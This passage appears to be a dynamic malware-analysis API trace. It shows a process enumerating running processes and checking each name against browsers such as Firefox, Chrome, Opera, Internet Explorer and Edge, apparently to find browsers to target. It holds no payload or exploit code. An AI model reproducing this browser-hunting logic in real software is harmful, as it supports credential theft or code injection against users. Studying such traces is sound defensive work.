lpString2="opera.exe") returned -1 [0230.740] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0230.740] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0230.740] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0230.740] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0230.740] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0230.740] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0230.740] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0230.740] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.741] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0230.741] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0230.741] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0230.741] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0230.741] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.741] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.741] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0230.741] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0230.741] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0230.741] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0230.741] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.741] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.742] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0230.742] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0230.742] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0230.742] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0230.742] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.742] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.743] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0230.743] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0230.743] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0230.743] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0230.743] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.743] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.743] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0230.743] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0230.743] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0230.743] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0230.743] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.743] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0230.744] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0230.744] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0230.744] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0230.744] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0230.744] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0230.744] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.744] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0230.744] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0230.744] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0230.744] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0230.744] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.744] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.745] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0230.745] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0230.745] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0230.745] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0230.745] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.745] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0230.745] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0230.746] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0230.746] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0230.746] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0230.746] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0230.746] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0230.746] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0230.746] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0230.746] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0230.746] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0230.746] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.746] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0230.747] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0230.747] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0230.747] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0230.747] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0230.747] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.747] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.747] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0230.747] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0230.747] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0230.747] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0230.747] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.747] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0230.748] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0230.748] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0230.748] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0230.748] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0230.748] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.748] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0230.751] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0230.751] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0230.751] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0230.751] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0230.752] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0230.752] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0230.752] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0230.752] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0230.752] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0230.752] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0230.752] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0230.752] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0230.753] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0230.753] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0230.753] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0230.753] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0230.753] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.753] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0230.753] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0230.753] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0230.753] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0230.753] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0230.753] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0230.753] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0230.754] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0230.754] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0230.754] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0230.754] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0230.754] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0230.754] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0230.754] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0230.755] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0230.755] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0230.755] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0230.755] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.755] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0230.755] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0230.755] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0230.755] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0230.755] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0230.755] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.755] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0230.756] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0230.756] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0230.756] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0230.756] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0230.756] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.756] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0230.756] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0230.756] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0230.756] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0230.756] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0230.756] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.756] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0230.757] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0230.757] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0230.757] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0230.757] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0230.757] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0230.757] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0230.758] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0230.758] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0230.758] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0230.758] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0230.758] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.758] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0230.758] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0230.758] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0230.758] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0230.758] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0230.758] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.758] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0230.759] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0230.759] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0230.759] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0230.759] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0230.759] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.759] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0230.759] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0230.759] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0230.759] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0230.759] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0230.759] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.759] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0230.760] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0230.760] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0230.760] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0230.760] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0230.760] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.760] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0230.760] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0230.760] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0230.760] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0230.761] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0230.761] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0230.761] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0230.761] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0230.761] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0230.761] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0230.761] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0230.761] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0230.761] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0230.762] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0230.762] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0230.762] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0230.762] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0230.762] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0230.762] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0230.762] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0230.762] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0230.762] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0230.762] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0230.762] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.762] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0230.763] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0230.763] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0230.763] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0230.763] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0230.763] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0230.763] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0230.763] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0230.763] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0230.763] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0230.763] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0230.763] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.763] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0230.764] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0230.764] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0230.764] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0230.764] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0230.764] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.764] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, 